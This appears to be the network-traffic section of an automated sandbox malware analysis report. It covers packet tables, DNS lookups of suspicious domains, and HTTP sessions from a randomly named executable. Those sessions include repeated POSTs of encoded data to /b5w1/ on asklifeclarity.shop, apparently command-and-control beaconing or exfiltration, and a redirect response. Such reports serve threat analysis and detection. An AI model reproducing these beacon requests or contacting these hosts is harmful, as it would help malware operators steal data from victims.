                                                                                                Nov 6, 2024 13:42:54.770875931 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770885944 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770889044 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770939112 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770952940 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770972967 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770993948 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:56.271768093 CET5142980192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:56.277528048 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:56.277610064 CET5142980192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:57.308079004 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:57.313172102 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:57.313366890 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:57.333697081 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:57.338862896 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.693639040 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.693726063 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.693737984 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.693799973 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.694078922 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694092035 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694169044 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.694360018 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694371939 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694382906 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694396019 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694396019 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.694407940 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.694420099 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.694451094 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.698677063 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.698759079 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.698769093 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.698803902 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.810648918 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.810764074 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.810776949 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.810869932 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.810985088 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811026096 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.811191082 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811204910 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811249971 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.811494112 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811599970 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811636925 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.811805964 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811819077 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.811855078 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.812047958 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.812060118 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.812099934 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.857693911 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.857719898 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.857812881 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.857831001 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.857939005 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.857975960 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.927695036 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.927745104 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.927793026 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.927911043 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.928014994 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928028107 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928040981 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928085089 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.928085089 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.928494930 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928639889 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928679943 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.928809881 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928822994 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.928859949 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.974823952 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.974926949 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.974940062 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.974992990 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:59.975279093 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.975291967 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:59.975320101 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.020153046 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.044801950 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.044838905 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.044883013 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.044979095 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.045104027 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.045120001 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.045135021 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.045160055 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.045182943 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.045609951 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.045624018 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.045665026 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.045924902 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.046103954 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.046145916 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.091787100 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.091900110 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.091912985 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.091953993 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.092206001 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.092300892 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.092318058 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.092478037 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.092516899 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.161851883 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.161923885 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.161933899 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162058115 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162117958 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162128925 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162142992 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162151098 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162151098 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162197113 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162702084 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162744999 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162779093 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162791967 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162837982 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209059000 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209162951 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209176064 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209239960 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209507942 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209520102 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209697962 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209794998 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209806919 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209832907 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.254642010 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.278736115 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278778076 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278872013 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278935909 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.278992891 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279005051 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279043913 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.279200077 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279305935 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279347897 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.279448986 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.281451941 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.301862955 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.306797981 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:05.400810003 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.405740976 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:05.406591892 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.430457115 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.435494900 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.089951038 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.146500111 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:06.149688005 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.150583982 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:06.984353065 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.017476082 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.022528887 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.026804924 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.050035000 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.055346012 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.713653088 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.752928972 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.752984047 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:10.146991014 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.183527946 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.188879013 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.188975096 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.213046074 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.218175888 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218193054 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218198061 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218216896 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218221903 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218230963 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218235970 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218269110 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218272924 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.881344080 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.920840979 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.920943975 CET5143380192.168.2.4162.0.231.203

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 6, 2024 13:41:36.543976068 CET5354829162.159.36.2192.168.2.4
                                                                                                Nov 6, 2024 13:41:37.187922955 CET6550553192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:41:37.197549105 CET53655051.1.1.1192.168.2.4
                                                                                                Nov 6, 2024 13:42:06.699683905 CET6064353192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:42:06.713854074 CET53606431.1.1.1192.168.2.4
                                                                                                Nov 6, 2024 13:42:27.502720118 CET5248953192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:42:27.787374020 CET53524891.1.1.1192.168.2.4
                                                                                                Nov 6, 2024 13:42:41.220483065 CET6326153192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:42:41.333054066 CET53632611.1.1.1192.168.2.4
                                                                                                Nov 6, 2024 13:42:49.422851086 CET5608053192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:42:49.438245058 CET53560801.1.1.1192.168.2.4
                                                                                                Nov 6, 2024 13:43:05.346530914 CET5855953192.168.2.41.1.1.1
                                                                                                Nov 6, 2024 13:43:05.387350082 CET53585591.1.1.1192.168.2.4

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 6, 2024 13:41:37.187922955 CET192.168.2.41.1.1.10x6b7dStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:06.699683905 CET192.168.2.41.1.1.10xc24Standard query (0)www.ontoweightloss.healthA (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:27.502720118 CET192.168.2.41.1.1.10xdccaStandard query (0)www.asklifeclarity.shopA (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:41.220483065 CET192.168.2.41.1.1.10x472bStandard query (0)www.worldoffun.onlineA (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:49.422851086 CET192.168.2.41.1.1.10xed24Standard query (0)www.waidzeitcz.shopA (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:43:05.346530914 CET192.168.2.41.1.1.10xfa44Standard query (0)www.windowmart.onlineA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 6, 2024 13:41:37.197549105 CET1.1.1.1192.168.2.40x6b7dName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:06.713854074 CET1.1.1.1192.168.2.40xc24No error (0)www.ontoweightloss.healthontoweightloss.healthCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:06.713854074 CET1.1.1.1192.168.2.40xc24No error (0)ontoweightloss.health3.33.130.190A (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:06.713854074 CET1.1.1.1192.168.2.40xc24No error (0)ontoweightloss.health15.197.148.33A (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:27.787374020 CET1.1.1.1192.168.2.40xdccaNo error (0)www.asklifeclarity.shop75.2.103.23A (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:41.333054066 CET1.1.1.1192.168.2.40x472bServer failure (2)www.worldoffun.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:49.438245058 CET1.1.1.1192.168.2.40xed24No error (0)www.waidzeitcz.shop172.67.163.171A (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:42:49.438245058 CET1.1.1.1192.168.2.40xed24No error (0)www.waidzeitcz.shop104.21.49.146A (IP address)IN (0x0001)false
                                                                                                Nov 6, 2024 13:43:05.387350082 CET1.1.1.1192.168.2.40xfa44No error (0)www.windowmart.online162.0.231.203A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • www.ontoweightloss.health
                                                                                                • www.asklifeclarity.shop
                                                                                                • www.waidzeitcz.shop
                                                                                                • www.windowmart.online

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.4512013.33.130.190802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:06.775727987 CET509OUTGET /3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.ontoweightloss.health
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Nov 6, 2024 13:42:07.382656097 CET399INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Wed, 06 Nov 2024 12:42:07 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 259
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 74 79 50 54 6c 3d 57 61 68 49 5a 6a 2b 78 57 34 45 4f 74 46 6a 5a 4d 30 52 66 48 34 6f 67 30 47 50 57 6a 74 4a 4b 58 76 42 2f 75 7a 53 79 54 2b 4a 32 37 6b 74 7a 6e 31 57 37 44 39 2b 5a 58 47 31 76 75 69 37 36 57 64 64 47 68 39 79 49 35 39 77 6b 34 54 51 4b 46 76 7a 6a 72 4d 58 62 69 6b 51 47 4a 73 6e 55 34 6e 51 57 4e 39 79 51 2b 7a 49 6e 6e 6e 58 43 6a 46 38 6b 50 63 6f 3d 26 5a 62 77 4c 3d 6a 50 6a 34 57 78 56 50 2d 50 67 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.45131575.2.103.23802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:27.826230049 CET784OUTPOST /b5w1/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 57 78 67 36 44 59 6a 6b 45 50 75 43 6b 7a 78 6e 43 4b 37 43 4e 44 49 37 5a 36 62 36 36 6f 4a 74 72 73 75 67 79 34 34 75 65 71 78 47 49 57 55 4d 75 45 34 49 67 6f 36 32 51 47 5a 77 67 54 64 32 35 30 39 66 43 69 50 35 79 4f 74 70 30 45 39 39 70 2f 6b 54 54 6d 57 52 4d 69 6f 58 5a 30 58 35 59 6f 6f 5a 33 7a 59 57 37 49 76 35 69 57 48 6d 71 75 39 6b 42 53 75 61 41 2b 5a 65 5a 55 67 32 6b 2b 4e 6f 61 52 51 59 42 50 61 66 44 6e 47 57 4e 4f 75 35 34 39 6b 50 67 63 30 53 67 5a 51 45 56 72 76 78 47 30 36 5a 71 61 31 2f 4c 78 41 6d 58 42 63 39 38 76 5a 31 72 48 53 5a 2b 73 57 43 37 41 3d 3d
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuCkzxnCK7CNDI7Z6b66oJtrsugy44ueqxGIWUMuE4Igo62QGZwgTd2509fCiP5yOtp0E99p/kTTmWRMioXZ0X5YooZ3zYW7Iv5iWHmqu9kBSuaA+ZeZUg2k+NoaRQYBPafDnGWNOu549kPgc0SgZQEVrvxG06Zqa1/LxAmXBc98vZ1rHSZ+sWC7A==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.45132975.2.103.23802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:30.399317026 CET804OUTPOST /b5w1/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 57 78 67 36 44 59 6a 6b 45 50 75 43 6c 51 70 6e 48 74 58 43 59 7a 49 34 46 71 62 36 6f 6f 4a 54 72 73 53 67 79 35 74 6a 64 59 46 47 49 32 45 4d 76 41 73 49 6a 6f 36 32 61 6d 5a 31 6a 6a 64 48 35 30 42 39 43 6d 48 35 79 4f 35 70 30 42 5a 39 6f 4d 63 53 53 32 57 54 48 43 6f 5a 55 55 58 35 59 6f 6f 5a 33 33 78 42 37 4d 44 35 69 46 50 6d 72 4b 70 6c 65 69 75 56 42 2b 5a 65 64 55 67 79 6b 2b 4e 4b 61 51 4d 69 42 4e 53 66 44 6d 32 57 4e 39 32 6d 74 74 6b 4e 6b 63 31 46 72 73 6f 4e 55 59 47 69 62 55 75 37 71 62 31 6d 4f 33 52 38 47 77 39 71 75 76 39 47 32 41 62 74 7a 76 72 4c 67 43 6e 46 37 48 4d 42 71 79 6f 66 77 64 41 76 73 31 30 4d 64 4d 73 3d
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuClQpnHtXCYzI4Fqb6ooJTrsSgy5tjdYFGI2EMvAsIjo62amZ1jjdH50B9CmH5yO5p0BZ9oMcSS2WTHCoZUUX5YooZ33xB7MD5iFPmrKpleiuVB+ZedUgyk+NKaQMiBNSfDm2WN92mttkNkc1FrsoNUYGibUu7qb1mO3R8Gw9quv9G2AbtzvrLgCnF7HMBqyofwdAvs10MdMs=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.45134575.2.103.23802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:32.982907057 CET10886OUTPOST /b5w1/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
